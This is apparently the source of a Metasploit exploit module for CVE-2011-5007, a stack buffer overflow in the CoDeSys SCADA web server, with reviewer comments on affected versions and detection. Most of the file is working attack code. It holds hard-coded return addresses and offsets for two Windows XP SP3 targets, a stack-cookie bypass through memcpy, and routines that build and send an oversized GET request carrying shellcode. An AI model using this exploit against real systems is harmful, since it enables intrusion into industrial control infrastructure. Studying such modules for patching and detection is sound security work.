GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
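# Metasploit remote exploit module for CVE-2011-5007, a stack buffer overflow
# in the 3S-Smart Software Solutions CoDeSys SCADA web server (CmpWebServer).
#
# Review notes for readers assessing exposure:
# - Per the module description, versions 3.4 SP4 Patch 2 and earlier are
#   affected; the ICS-CERT references below are the advisories to check for
#   fixed versions.
# - Both targets use hard-coded addresses and are labelled Windows XP SP3, so
#   the module as written is tied to those two builds.
# - The default port registered below is 8080; that is the listener to
#   inventory and to restrict at the network boundary.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Declares module metadata (references, payload constraints, targets) and
  # registers the default remote port.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a remote stack buffer overflow vulnerability in
        3S-Smart Software Solutions product CoDeSys Scada Web Server Version
        1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and
        earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Luigi Auriemma', # Original discovery and poc
          'Celil UNUVER',
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
          'sinn3r',
          'Michael Coppola'
        ],
      'References' =>
        [
          [ 'CVE', '2011-5007'],
          [ 'OSVDB', '77387'],
          [ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
          [ 'EDB', '18187' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],
          # The following clarifies why two people are credited for the discovery
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => false
        },
      'Platform' => 'win',
      'Payload' =>
        {
          # NOTE(review): the key is lowercase 'size'; confirm the framework
          # reads it as the payload space limit.
          'size' => 650,
          # Bytes kept out of the encoded payload: NUL, tab, LF, '?', space,
          # '#', '^', '%', ':' and '\'. Presumably these would end or alter
          # the request path the payload travels in -- confirm.
          'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",
        },

      'Targets' =>
        [
          [
            'CoDeSys v2.3 on Windows XP SP3',
            {
              'Ret' => 0x7E4456F7, # jmp esp user32
              'Offset' => 775
            }
          ],
          [
            'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',
            {
              # Abuse a memcpy() call to circumvent stack cookies
              'Offset' => 525,
              'Ret' => 0x02CDFD68,
              'Src' => 0x02CDFD58,
              'Dest' => 0x02CDFA14
            }
          ],
        ],
      'Privileged' => false,
      'DisclosureDate' => '2011-12-02'
    ))

    register_options([Opt::RPORT(8080)])
  end

  # Fingerprints the service with a plain "GET /" and looks for the
  # 3S_WebServer string in whatever comes back.
  #
  # The result is a banner match only. The server gives no version, so
  # Detected means "this product answered", not "this host is vulnerable",
  # and Safe means only that a response arrived without the banner string.
  #
  # @return [Exploit::CheckCode] Detected when the banner string is present,
  #   Unknown when no response was received, Safe otherwise
  def check
    res = nil
    begin
      connect
      sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")
      res = sock.get_once
    ensure
      # Close the socket even when the send or read raises.
      disconnect
    end

    # Can't flag the web server as vulnerable, because it doesn't
    # give us a version
    vprint_line(res.to_s)

    # No data at all tells us nothing about the host; reporting Safe here
    # would give an assessor false assurance about an unreachable device.
    return Exploit::CheckCode::Unknown if res.nil?

    if res.to_s.include?('3S_WebServer')
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Builds the oversized request path for the selected target, sends it as a
  # single GET request and then hands control to the payload handler.
  #
  # Detection note: the request line carries a path of Offset filler bytes
  # (775 or 525) followed by packed 32-bit values, eight NOP bytes and the
  # encoded payload, sent as HTTP/1.0 with no headers. A request-line length
  # limit or an oversized-URI rule in front of the web server port covers
  # both targets.
  def exploit
    connect

    if target.name =~ /v2\.3/
      buffer = rand_text(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << make_nops(8)
      buffer << payload.encoded

    else
      # CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3
      buffer = rand_text_alphanumeric(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << [target['Src']].pack('V')
      buffer << [target['Dest']].pack('V')
      buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison
      buffer << make_nops(8)
      buffer << payload.encoded
      buffer << "\\a"
    end

    sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

    print_status("Trying target #{target.name}...")
    sock.put(sploit)
    # Wait up to 5 seconds for a reply and echo it to the console if one came.
    res = sock.get_once(-1, 5)
    print_line(res) unless res.nil?

    handler
    disconnect
  end
end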
=begin
target.ret verified on:
- Win XP SP3 unpatched
- Win XP SP3 fully-patched
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed
=end